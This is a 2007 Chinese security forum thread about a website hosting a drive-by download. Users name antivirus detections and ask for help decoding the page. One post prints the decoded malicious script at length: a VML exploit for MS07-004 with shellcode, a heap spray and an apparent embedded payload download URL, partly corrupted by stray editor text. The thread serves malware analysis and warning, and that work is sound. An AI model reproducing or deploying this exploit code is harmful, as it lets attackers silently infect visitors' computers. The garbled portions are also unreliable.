网站挂马

显示全部楼层 · 发表于 2007-3-18 09:58:21

http://www.ip16888.com/zg/news.htm

显示全部楼层 · 发表于 2007-3-18 10:22:57

饿
什么病毒
晕
红伞连跳

显示全部楼层 · 发表于 2007-3-18 10:35:29

周总
对付这些中文加密的你能给个好解密的吗？

显示全部楼层 · 发表于 2007-3-18 10:39:59

卡巴斯基反病毒6.0
The requested URL http://www.ip16888.com/zg/news.htm is infected with Exploit.HTML.Agent.f virus

显示全部楼层 · 发表于 2007-3-18 11:48:25

nod没发现……什么啊……

显示全部楼层 · 发表于 2007-3-18 13:59:16

原帖由 傻猪猪米走鸡 于 2007-3-18 11:48 发表
nod没发现……什么啊……

用opera踩毒网一般是没事的

显示全部楼层 · 发表于 2007-3-18 15:32:53

US-ASCII加密的毒網~基本上會用這種技術加密通常不會有好事~!!

會解US-ASCII幫忙一下吧~!!

显示全部楼层 · 发表于 2007-3-18 17:49:41

<SCRIPT LANGUAGE="javascript" TYPE="text/javascript">
var cookieString = document.cookie;
var start = cookieString.indexOf("woshiexp=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 12 * 30 * 24 * 60 * 60 * 1000);
document.cookie = "woshiexp=Ms07004;expires=" + expires.toGMTString();
document.write(unescape("<HTML xmlns:v="urn:schemas-microsoft-com"));
document.write(unescape(":vml"
xmlns:o="urn:schemas-microsoft-com"));
document.write(unescape(":office:office">
<HEAD>

<STYLE>
v\:* { "));
document.write(unescape("behavior: url(#default#VML);}
o\:* { be"));
document.write(unescape("havior: url(#default#VML);}
</STYLE>
<TI"));
document.write(unescape("TLE></TITLE>
</HEAD>
<BODY onload=window"));
document.write(unescape(".status="">
<script>
sh = unescape("%u90"));
document.write(unescape("90邐邐哫疋謼㕴%u"));
document.write(unescape("0378囵皋̠㏵䧉굁"));
document.write(unescape("�༶ᒾ㠨瓲섈%u0d"));
document.write(unescape("cb�㯯痟廧庋%u"));
document.write(unescape("0324曝ಋ譋ᱞ�ҋ"));
document.write(unescape("΋쏅牵浬湯搮%u6c"));
document.write(unescape("6c䌀尺⹕硥e쀳%u"));
document.write(unescape("0364぀౸䂋謌ᱰ训"));
document.write(unescape("ࡀ৫䂋贴籀䂋%u95"));
???????<=>??????选中“&#;”；默认“,”?document.write(unescape("3c躿๎ﾄ?%u"));
document.write(unescape("8304␬＼闐뽐ᨶ瀯"));
???选中“&#”????<=>??????选中"document.write(unescape("濨?诿⑔跼멒%udb"));
document.write(unescape("33卓匤탿뽝ﺘ%u"));
[完成后可按 Ct\u"(双字节)；默认"\"(单字节)????选中"&#xdocument.write(unescape("0e8a叨?菿Ӭⲃ戤"));
;"????选中"\x"????<=>????????|?document.write(unescape("탿线?｀?%uff"));
?????????|??????????替换??为??(document.write(unescape("52ￗ?"));
document.write(unescape("瑨灴⼺眯睷愮獩敨杮潨挮浯搯睯⹮硥e"));
document.write(unescape("");

sz = sh.l"));
document.write(unescape("ength * 2;
npsz = 0x400000-(sz+0x38);
np"));
document.write(unescape("s = unescape ("഍഍");
while (np"));
document.write(unescape("s.length*2<npsz) nps+=nps;
ihbc = (0x060"));
document.write(unescape("00000-0x400000)/0x400000;
mm = new Array"));
document.write(unescape("();
for (i=0;i<ihbc;i++) mm = nps+sh;"));
document.write(unescape("
</script>
<v:shapetype id="_x0000_t75" "));
document.write(unescape("coordsize="15000,19900" o:spt="75"
o:"));
document.write(unescape("preferrelative="t" path="m@4@5l@4@11@9@1"));
document.write(unescape("1@9@5xe" filled="f" stroked="f">
<v:s"));
document.write(unescape("troke joinstyle="miter"/>
<v:formulas"));
document.write(unescape(">
<v:f eqn="if lineDrawn pixelLineWi"));
document.write(unescape("dth 0"/>
<v:f eqn="sum @0 1 0"/>
"));
document.write(unescape(" <v:f eqn="sum 0 0 @1"/>
<v:f eqn="p"));
document.write(unescape("rod @2 1 2"/>
<v:f eqn="prod @3 1500"));
document.write(unescape("0 pixelWidth"/>
<v:f eqn="prod @3 19"));
document.write(unescape("900 pixelHeight"/>
<v:f eqn="sum @0 "));
document.write(unescape("0 1"/>
<v:f eqn="prod @6 1 2"/>
"));
document.write(unescape("<v:f eqn="prod @7 15000 pixelWidth"/>
  "));
document.write(unescape("  <v:f eqn="sum @8 15000 0"/>
<v:f e"));
document.write(unescape("qn="prod @7 19900 pixelHeight"/>
<v:"));
document.write(unescape("f eqn="sum @10 19900 0"/>
</v:formula"));
document.write(unescape("s>
<v:path o:extrusionok="f" gradient"));
document.write(unescape("shapeok="t" o:connecttype="rect"/>
<o"));
document.write(unescape(":lock v:ext="edit" aspectratio="t"/>
  <"));
document.write(unescape("/v:shapetype>
<v:shape id="test" type="#"));
document.write(unescape("_x0000_t75" style="position:absolute; le"));
document.write(unescape("ft:0;top:0;width:117pt;height:120pt">
  "));
document.write(unescape("<v:imagedata src="./test.jpg" o:title="g"));
document.write(unescape("y" grayscale="t" />
  <v:shadow on="t" "));
document.write(unescape("/>
<v:recolorinfo recolorstate="t" numc"));
document.write(unescape("olors="1" numfills="1073741824">
   <v:r"));
document.write(unescape("ecolorinfoentry tocolor="11111111" fromc"));
document.write(unescape("olor="11111111" />
  <v:recolorinfoentr"));
document.write(unescape("y tocolor="schemeFollowed" fromcolor="11"));
document.write(unescape("150032" />
  <v:recolorinfoentry tocolo"));
document.write(unescape("r="rgb(67,63,56)" recolortype="1" lbcolo"));
document.write(unescape("r="rgb(45,222,221)" forecolor="11111111""));
document.write(unescape(" backcolor="11111111" bitmaptype="3" />
"));
document.write(unescape("

  </v:recolorinfo>
</v:shape>

</BO"));
document.write(unescape("DY>
</HTML>

显示全部楼层 · 发表于 2007-3-18 17:53:30

刺客集团MS07004 US-ASCII网马生成器做的

显示全部楼层 · 发表于 2007-3-18 22:15:25

上去了，没有发现问题哈

[病毒样本] 网站挂马

本帖子中包含更多资源